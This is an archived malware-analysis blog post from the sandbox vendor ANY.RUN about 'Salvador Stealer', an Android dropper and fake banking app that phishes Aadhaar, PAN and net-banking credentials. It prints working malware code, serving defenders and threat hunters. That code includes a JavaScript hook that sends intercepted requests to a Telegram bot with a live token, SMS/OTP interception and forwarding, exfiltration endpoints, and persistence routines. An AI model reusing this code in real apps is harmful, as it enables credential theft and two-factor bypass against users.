{
	"id": "0163b4dc-d7c3-4196-bb76-f53d19cbe8f4",
	"created_at": "2026-04-06T00:17:42.182956Z",
	"updated_at": "2026-04-10T03:21:29.711896Z",
	"deleted_at": null,
	"sha1_hash": "dc83e3e6c01d73c0459f2f225ffe78fb82150b24",
	"title": "Salvador Stealer: Analysis of New Mobile Banking Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 516507,
	"plain_text": "Salvador Stealer: Analysis of New Mobile Banking Malware\r\nBy Achmad Adhikara\r\nArchived: 2026-04-05 16:47:30 UTC\r\nIn this report, we examine an Android malware sample recently collected and analyzed by our team. This malware\r\nmasquerades as a banking application and is built to steal sensitive user information. During the analysis, we came\r\nacross internal references to “Salvador,” so we decided to name it Salvador Stealer. \r\nReal-time visibility into mobile malware behavior is crucial for security teams, SOC analysts, and mobile app\r\nproviders. This analysis demonstrates how advanced threats can bypass user trust and steal sensitive data,\r\nhighlighting the need for dynamic malware analysis solutions. \r\nSalvador Stealer Overview \r\nThe collected malware sample is a dropper that delivers a banking stealer masquerading as a legitimate banking\r\napp. Its primary goal is to collect sensitive user information, including: \r\nRegistered mobile number \r\nAadhaar number \r\nPAN card details \r\nDate of birth \r\nNet banking user ID and password \r\nIt embeds a phishing website inside the Android application to trick users into entering their credentials. Once\r\nsubmitted, the stolen data is immediately sent to both the phishing site and a C2 server controlled via Telegram. \r\nIn this technical breakdown, we’ll walk you through how this malware operates, how it maintains persistence, and\r\nhow it exfiltrates sensitive data in real time. \r\nKey Takeaways \r\nMulti-Stage Attack Chain: Salvador Stealer uses a two-stage infection process — a dropper APK that\r\ninstalls and launches the actual banking stealer payload. \r\nPhishing-Based Credential Theft: The malware embeds a phishing website within the Android app to\r\ncollect sensitive personal and banking information, including Aadhaar number, PAN card, and net banking\r\ncredentials. \r\nReal-Time Data Exfiltration: Stolen credentials are immediately sent to both a phishing server and a\r\nCommand and Control (C2) server via Telegram Bot API. \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 1 of 22\n\nSMS Interception \u0026 OTP Theft: Salvador Stealer abuses SMS permissions to capture incoming OTPs\r\nand banking verification codes, helping attackers bypass two-factor authentication. \r\nMultiple Exfiltration Channels: The malware forwards stolen SMS data via dynamic SMS forwarding\r\nand HTTP POST requests, ensuring data reaches the attacker even if one channel fails. \r\nPersistence Mechanisms: Salvador Stealer automatically restarts itself if stopped and survives device\r\nreboots by registering system-level broadcast receivers. \r\nExposed Infrastructure: During analysis, we found the phishing infrastructure and admin panel publicly\r\naccessible, exposing an attacker’s WhatsApp contact, suggesting a possible link to India. \r\nMalware Behavior Analysis \r\nTo uncover the full behavior of Salvador Stealer and observe its actions in real time, we executed the sample\r\ninside ANY.RUN’s new Android sandbox.\r\nView the full analysis session \r\nAnalysis of the Salvador malware inside ANY.RUN Sandbox’s interactive Android VM\r\nThis interactive environment allowed us to quickly analyze the malware’s behavior, visualize its activity, and\r\nidentify key indicators, all while saving significant analysis time. \r\nMalware Structure \r\nThe malware consists of two key components: \r\nDropper APK – Installs and triggers the second-stage payload. \r\nBase.apk (Payload) – The actual banking credential stealer responsible for data theft. \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 2 of 22\n\nDropper APK Behavior\nThe dropper APK is designed to silently install and execute the malicious payload. To enable this, it declares\nspecific permissions and intent filters in its AndroidManifest.xml, including:\nAndroidManifest.xml\nAnd\n\nBase.apk displayed inside the initial dropper APK using WinRAR\r\nOnce executed, base.apk exhibits several key behaviors: \r\nIt establishes a connection to Telegram, which the attackers use as a Command and Control (C2) server to\r\nreceive stolen data and manage the infection. \r\nIt triggers the signature “Starts itself from another location,” confirming that it was dropped and\r\nlaunched by the initial dropper APK rather than being installed directly. \r\nProcess communicating with Telegram revealed inside ANY.RUN Android sandbox\r\nPhishing Interface \u0026 Data Theft  \r\nThe Salvador Stealer tricks users into entering their banking credentials through a fake banking interface phishing\r\npage embedded in the app. \r\nOnce the user submits their credentials, the data is immediately sent to both the C2 server and a Telegram bot. \r\nStep 1: Collecting Personal Information\r\nOn the first page, the app prompts the user to enter: \r\nRegistered mobile number \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 4 of 22\n\nAadhaar number \r\nPAN card details \r\nDate of birth \r\nThe interface of the fake banking app displayed inside ANY.RUN Android sandbox \r\nOnce this information is submitted, it is immediately sent to: \r\nA phishing website controlled by the attacker \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 5 of 22\n\nStolen data sent to phishing site \r\nA Telegram bot used as part of the malware’s C2 infrastructure \r\nStolen data sent to Telegram C2 server \r\nStep 2: Stealing Banking Credentials \r\nOn the next stage, the app asks the user to provide: \r\nNet banking user ID \r\nPassword \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 6 of 22\n\nBanking credentials provided to cyber attackers \r\nThis data is also exfiltrated to both the phishing server and the Telegram bot. We can see this easily inside\r\nANY.RUN Android sandbox:  \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 7 of 22\n\nStolen data sent to phishing site\r\nThese credential theft attempts were clearly captured in the HTTP request logs during sandbox analysis.\r\nStolen data sent to Telegram C2 server\r\nBy enabling HTTPS MITM Proxy mode in ANY.RUN’s Android sandbox, we were able to intercept and verify\r\nthe exfiltration of user data in real time. \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 8 of 22\n\nCredential theft attempts captured in the HTTP request logs\r\nTechnical Analysis \r\nThe base.apk file embedded in the dropper APK contains the core malicious functionality of Salvador\r\nStealer. Here’s a detailed look at its structure  \r\n \r\nBase.apk file structure\r\nEncrypted Strings \u0026 Obfuscation \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 9 of 22\n\nWe’ll begin by opening one of the Java files to analyze its contents. Let’s start with Earnestine.java.\r\npublic class Earnestine extends BroadcastReceiver {\r\n private static final Map\u003cString, StringBuilder\u003e sdghedy = new ConcurrentHashMap();\r\n \r\n @Override // android.content.BroadcastReceiver\r\n public void onReceive(Context context, Intent intent) {\r\n Object[] pdus;\r\n if (intent.getAction().equals(NPStringFog.decode(\"0F1E09130108034B021C1F1B080A04154B260B1C0811060E091C5C\r\n for (Object pdu : pdus) {\r\n... \r\nWe can see that the strings are encrypted using a custom method. The decryption is performed using\r\nNPStringFog.decode(…), defined in the NPStringFog.java class.  \r\nLet’s examine that next to understand what type of encryption is used. \r\nOpening NPStringFog.java, we can confirm that it implements XOR decryption using a static key: “npmanager”. \r\npackage obfuse;\r\n \r\nimport java.io.ByteArrayOutputStream;\r\n \r\npublic class NPStringFog {\r\n public static String KEY = \"npmanager\"; // XOR key\r\n private static final String hexString = \"0123456789ABCDEF\"; // Hexadecimal string for conversion\r\n \r\n public static String decode(String str) {\r\n ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length() / 2);\r\n \r\n // Convert hex string to byte array\r\n for (int i = 0; i \u003c str.length(); i += 2) {\r\n baos.write((hexString.indexOf(str.charAt(i)) \u003c\u003c 4) | hexString.indexOf(str.charAt(i + 1)));\r\n }\r\n \r\n byte[] b = baos.toByteArray();\r\n int len = b.length;\r\n int keyLen = KEY.length();\r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 10 of 22\n\n// XOR decryption\r\n for (int i2 = 0; i2 \u003c len; i2++) {\r\n b[i2] = (byte) (b[i2] ^ KEY.charAt(i2 % keyLen)); // XOR byte with key\r\n }\r\n \r\n return new String(b);\r\n }\r\n}\r\nThis confirms that the encryption is XOR-based. Using CyberChef, we can manually decode strings like the one\r\nfound in Earnestine: \r\nDecoding strings with the help of CyberChef \r\nCyberchef rule:\r\nhttps%3A%2F%2Fgchq.github.io%2FCyberChef%2F%23recipe%3DFrom_Hex%28%27Auto%27%29XOR%28%257B%27option%27%3A%27Lat\r\nTo analyze the rest of the APK effectively, we’ll need to decode all encrypted strings automatically. Here’s a\r\nPython script that recursively scans all .java files, decrypts any encrypted strings using the same XOR method,\r\nand writes the result to a _decoded.java file.\r\nimport re\r\nimport os\r\n \r\ndef decode_npstringfog(encoded: str, key: str = \"npmanager\") -\u003e str:\r\n b = bytearray()\r\n for i in range(0, len(encoded), 2):\r\n b.append(int(encoded[i:i+2], 16))\r\n key_bytes = key.encode()\r\n return bytearray((b[i] ^ key_bytes[i % len(key_bytes)]) for i in range(len(b))).decode(errors=\"replace\")\r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 11 of 22\n\ndef decode_and_save(filepath: str):\r\n with open(filepath, \"r\", encoding=\"utf-8\") as f:\r\n content = f.read()\r\n \r\n # Find all NPStringFog.decode(\"...\")\r\n pattern = re.compile(r'NPStringFog\\.decode\\(\"([0-9A-F]+)\"\\)')\r\n if not pattern.search(content):\r\n return\r\n \r\n decoded_content = pattern.sub(lambda m: f'\"{decode_npstringfog(m.group(1))}\"', content)\r\n \r\n outpath = filepath.replace(\".java\", \"_decoded.java\")\r\n with open(outpath, \"w\", encoding=\"utf-8\") as f:\r\n f.write(decoded_content)\r\n print(f\"[+] Decoded file written: {outpath}\")\r\n \r\ndef walk_and_decode(base_dir: str = \".\"):\r\n for root, _, files in os.walk(base_dir):\r\n for file in files:\r\n if file.endswith(\".java\"):\r\n full_path = os.path.join(root, file)\r\n decode_and_save(full_path)\r\n \r\nwalk_and_decode()\r\nWebView-Based Phishing Page \r\nNow that we’ve decoded the files, we can begin our deeper analysis of base.apk.  \r\nLet’s start with Helene.java, which acts as the main activity of the application. It loads a webpage and handles\r\nruntime permissions. \r\n Upon launch, it checks for the necessary Android permissions and ensures there is an active internet connection. \r\n@Override\r\npublic void onCreate(Bundle savedInstanceState) {\r\n super.onCreate(savedInstanceState);\r\n setContentView(R.layout.activity_ffff);\r\n changeStatusBarColor(\"#4CAF50\");\r\n ...\r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 12 of 22\n\nif (checkPermissions(this)) {\r\n WebView webView = (WebView) findViewById(R.id.randomWebView);\r\n setupWebView(this, webView);\r\n initiateForegroundServiceIfRequired();\r\n } else {\r\n requestAppPermissions();\r\n }\r\n}\r\nThis method sets up the UI, verifies permissions, and initializes a WebView. The setupWebView() method enables\r\nJavaScript and DOM storage, then loads the phishing page:\r\npublic void setupWebView(Context context, final WebView webView) {\r\n WebSettings settings = webView.getSettings();\r\n settings.setJavaScriptEnabled(true);\r\n settings.setDomStorageEnabled(true);\r\n ...\r\n webView.loadUrl(\"https://t15.muletipushpa.cloud/page/\");\r\n}\r\nOnce the page finishes loading, a malicious JavaScript payload is injected: \r\nString jsCode = \"eval(decodeURIComponent('%28%66%75%6e%63%74%69.....'));\";\r\nAfter decoding, the JavaScript reveals that it hooks into  XMLHttpRequest.prototype.send, which is commonly\r\nused by web apps to send data (e.g., login credentials or session info). \r\n(function() {\r\n const originalSend = XMLHttpRequest.prototype.send;\r\n XMLHttpRequest.prototype.send = function(data) {\r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 13 of 22\n\ntry {\r\n const botToken = \"7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE\";\r\n const chatId = \"-1002480016557\";\r\n const telegramUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;\r\n const telegramMessage = {\r\n chat_id: chatId,\r\n text: `Intercepted Data Sent:\\n${data}`\r\n };\r\n fetch(telegramUrl, {\r\n method: 'POST',\r\n headers: {\r\n 'Content-Type': 'application/json'\r\n },\r\n body: JSON.stringify(telegramMessage)\r\n });\r\n } catch (e) {\r\n console.error(\"Error sending to Telegram:\", e);\r\n }\r\n return originalSend.apply(this, arguments);\r\n };\r\n})();\r\nIt intercepts all AJAX/XHR requests made from the loaded phishing page. These intercepted payloads are sent to a\r\nhardcoded Telegram chat via the Bot API. \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 14 of 22\n\nLearn to analyze cyber threats\r\nSee a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis\r\nRead full guide\r\nSMS Interception \u0026 OTP Theft \r\nAfter loading the phishing WebView it requests several Android permissions, including:  \r\nRECEIVE_SMS \r\nSEND_SMS \r\nREAD_SMS \r\nINTERNET  \r\nThese permissions are essential for the malware’s goals—intercepting one-time passwords (OTPs) and forwarding\r\nthem. \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 15 of 22\n\nOnce the permissions are granted, the initiateForegroundServiceIfRequired() method is called, launching the\r\nFitzgerald service. \r\nThis foreground service creates a fake notification (“Customer support”) and more importantly, it immediately\r\nregisters a broadcast receiver to intercept incoming SMS: \r\nthis.smsReceiver = new Earnestine();\r\nregisterReceiver(this.smsReceiver, new IntentFilter(\"android.provider.Telephony.SMS_RECEIVED\"));\r\nThis is the real starting point of the OTP interception process. Every incoming message is captured and parsed by\r\nEarnestine. From the PDU, the malware extracts the message body, sender’s number, and timestamp: \r\nSmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu, \"3gpp\");\r\nString messageBody = sms.getMessageBody();\r\nString senderId = sms.getOriginatingAddress();\r\nlong timestamp = sms.getTimestampMillis();\r\nData Exfiltration Methods\r\nThe message is then stored using a map that groups multipart SMS messages together. Once it decides the\r\nmessage is complete and ready for exfiltration, the malware uses two separate mechanisms to forward it to the\r\nattacker: \r\n1. Dynamic SMS forwarding:  \r\nInside a function named Bradford(), the malware contacts a remote server to retrieve a forwarding number. \r\nString urlString = \"https://t15.muletipushpa.cloud/json/number.php\";\r\n...\r\nString phoneNumber = jsonObject.optString(\"number\", \"\");\r\nEarnestine.this.sendSMS(messageBody, phoneNumber);\r\nThis number is set by the attacker and can be changed at any time. If the server responds with enabled: true, the\r\nmessage is forwarded to that number using the standard SmsManager. \r\nsmsManager.sendTextMessage(phoneNumber, null, messageBody, null, null);\r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 16 of 22\n\nIf the number is not available or the response is malformed, the malware will fall back to a previously saved one\r\nstored in SharedPreferences. It uses the key “Salvador” as the name of the preference file, and\r\n“forwardingNumber” as the key to retrieve the last known destination.  \r\nThis use of “Salvador” as a unique identifier for internal storage is what led us to name this malware Salvador\r\nStealer: \r\nSharedPreferences sharedPreferences = context.getSharedPreferences(\"Salvador\", 0);\r\nString savedPhoneNumber = sharedPreferences.getString(\"forwardingNumber\", \"\");\r\nThis suggests the malware is designed to persist attacker-supplied configuration data between sessions, allowing it\r\nto continue exfiltrating OTPs even when the server is unreachable or temporarily offline. \r\n2. HTTP-Based Fallback \r\nThrough another method called Randall(), the malware constructs a JSON payload containing the sender ID,\r\nmessage content, and timestamp: \r\njsonData.put(\"sender_id\", senderId);\r\njsonData.put(\"message\", messageBody);\r\njsonData.put(\"timestamp\", timestamp);\r\nThis data is then sent in a POST request to another hardcoded endpoint: \r\nString apiUrl = \"https://t15.muletipushpa.cloud/post.php\";\r\nBy using both SMS and HTTP as parallel delivery channels, the malware increases its chances of reliably\r\ndelivering OTPs or any sensitive codes it intercepts, ensuring the attacker receives them regardless of connectivity\r\nissues or SMS blocking. \r\nPersistence Mechanism \r\nEven if the user or system tries to terminate the app’s background service, the malware is programmed to\r\nautomatically restart it. When the Fitzgerald service is killed or swiped away, it immediately schedules a recovery\r\ntask using Android’s WorkManager: \r\nWorkRequest serviceRestartWork = new OneTimeWorkRequest.Builder(Mauricio.class)\r\n .setInitialDelay(1L, TimeUnit.SECONDS)\r\n .build();\r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 17 of 22\n\nWorkManager.getInstance(getApplicationContext()).enqueue(serviceRestartWork);\r\nThe scheduled worker points to the Mauricio class. Inside, it simply relaunches Fitzgerald: \r\nIntent Pasquale = new Intent(getApplicationContext(), Fitzgerald.class);\r\ngetApplicationContext().startForegroundService(Pasquale);\r\nThis way, even if the user tries to shut the app down from the task manager or system settings, the malware\r\nsilently revives itself within seconds. \r\nIf the device itself is rebooted, the malware still survives. A separate class named Ellsworth is responsible for this\r\nbehavior. It listens for the system-wide BOOT_COMPLETED broadcast and triggers the Fitzgerald service again: \r\npublic class Ellsworth extends BroadcastReceiver {\r\n @Override\r\n public void onReceive(Context context, Intent intent) {\r\n if (intent.getAction().equals(\"android.intent.action.BOOT_COMPLETED\")) {\r\n Intent serviceIntent = new Intent(context, (Class\u003c?\u003e) Fitzgerald.class);\r\n context.startService(serviceIntent);\r\n }\r\n }\r\n}\r\nThis guarantees that the malware regains control after reboot and resumes intercepting SMS messages\r\nimmediately. \r\nInteresting Findings \r\nDuring our analysis, we identified that the fake banking interface used by Salvador Stealer is actually a phishing\r\nwebsiteembedded inside the Android application. \r\n The phishing page can be accessed directly at: \r\n👉 hxxxs://t15[.]muletipushpa[.]cloud/page/start[.]php \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 18 of 22\n\nPhishing page that encourages victims to share their personal data \r\nWe also detected another phishing page hosted on a different subdomain, following a pattern with incremental\r\ndigits—from t01.* up to t15.*  \r\nAt the time of writing, the attacker has also left the admin panel accessible to anyone. \r\nThe admin login page is publicly available at: \r\n👉 hxxxs://t15[.]muletipushpa[.]cloud/admin/login[.]php \r\nAdmin login page available to everyone \r\nBrute-forcing the admin login panel reveals a message prompting the user to contact a WhatsApp number, likely\r\nbelonging to the developer of this phishing malware. \r\nhxxxs://api[.]whatsapp[.]com/send/?phone=916306285085\u0026text\u0026type=phone_number\u0026app_absent=0\r\nExposed phone number: +916306285085 \r\nThis suggests that the attacker is either based in India or using an Indian phone number as a disguise. \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 19 of 22\n\nSalvador Threat Impact \r\nThe Salvador Stealer campaign poses a serious risk to both individuals and organizations: \r\nFor end users: Victims risk financial fraud, identity theft, and unauthorized access to their banking\r\naccounts. \r\nFor financial institutions: This malware undermines customer trust, increases fraud cases, and may lead\r\nto reputational damage. \r\nFor security teams: Salvador Stealer’s layered infection chain, real-time data exfiltration, and SMS\r\ninterception tactics make detection difficult without advanced analysis tools. \r\nFor mobile ecosystem: The use of legitimate-looking banking apps and embedded phishing pages\r\nhighlights the growing trend of sophisticated Android-based social engineering attacks. \r\nConclusion \r\nThe analysis of Salvador Stealer reveals how modern Android malware combines phishing, credential theft, and\r\nadvanced persistence techniques to compromise sensitive financial data. Threats like this highlight the increasing\r\ncomplexity of mobile malware and the growing challenge of detecting and stopping them before damage is done. \r\nBy analyzing Salvador Stealer in real time using ANY.RUN’s Android sandbox, we were able to fully map its\r\nbehavior, uncover its infrastructure, and extract key indicators in just minutes—something that would otherwise\r\nrequire hours of manual static analysis. \r\nHere’s how analysis like this can bring value: \r\nFaster threat detection: Quickly identify malicious behaviors and communication patterns. \r\nComplete visibility: Observe real-time actions of mobile malware, including data exfiltration and\r\npersistence tactics. \r\nReduced investigation time: Automate and accelerate the technical analysis process. \r\nImproved response: Provide clear, actionable Indicators of Compromise (IOCs) for threat hunting and\r\nincident response. \r\nEnhanced threat intelligence: Expose attacker infrastructure and techniques that may be used in future\r\ncampaigns. \r\nEffective defense starts with better visibility. Tools like ANY.RUN’s sandbox make real-time threat analysis\r\nactionable and accessible to everyone. \r\nTry ANY.RUN’s Android Sandbox now \r\nIndicators of Compromise (IOC) \r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 20 of 22\n\n🔗 Phishing URL: \r\nt01[.]muletipushpa[.]cloud \r\nt02[.]muletipushpa[.]cloud \r\nt03[.]muletipushpa[.]cloud \r\nt04[.]muletipushpa[.]cloud \r\nt05[.]muletipushpa[.]cloud \r\nt06[.]muletipushpa[.]cloud \r\nt08[.]muletipushpa[.]cloud \r\nt10[.]muletipushpa[.]cloud \r\nt11[.]muletipushpa[.]cloud \r\nt12[.]muletipushpa[.]cloud \r\nt13[.]muletipushpa[.]cloud \r\nt14[.]muletipushpa[.]cloud \r\nt15[.]muletipushpa[.]cloud \r\nta01[.]muletipushpa[.]cloud \r\n📡 C2 Server (Telegram Bot): \r\nhxxs://api[.]telegram[.]org/bot7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE \r\n🔍 File Hashes: \r\nINDUSLND_BANK_E_KYC.apk \r\nSHA256: 21504D3F2F3C8D8D231575CA25B4E7E0871AD36CA6BBB825BF7F12BFC3B00F5A \r\nBase.apk \r\nSHA256:  \r\n7950CC61688A5BDDBCE3CB8E7CD6BEC47EEE9E38DA3210098F5A5C20B39FB6D8 \r\nThreat actor’s phone number: \r\n+916306285085 \r\nAbout ANY.RUN\r\nANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies\r\nmalware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI\r\nLookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to\r\nincidents faster.\r\nAdhikara\r\nAchmad Adhikara\r\nThreat Hunter at ANY.RUN | + posts\r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 21 of 22\n\nAchmad Adhikara is a threat hunter at ANY.RUN. Former red teamer. I chase threats. I prefer to stay below\r\nperiscope depth. fnord.\r\nAchmad Adhikara is a threat hunter at ANY.RUN. Former red teamer. I chase threats. I prefer to stay below\r\nperiscope depth. fnord.\r\nSource: https://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nhttps://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://any.run/cybersecurity-blog/salvador-stealer-malware-analysis/"
	],
	"report_names": [
		"salvador-stealer-malware-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434662,
	"ts_updated_at": 1775791289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dc83e3e6c01d73c0459f2f225ffe78fb82150b24.pdf",
		"text": "https://archive.orkl.eu/dc83e3e6c01d73c0459f2f225ffe78fb82150b24.txt",
		"img": "https://archive.orkl.eu/dc83e3e6c01d73c0459f2f225ffe78fb82150b24.jpg"
	}
}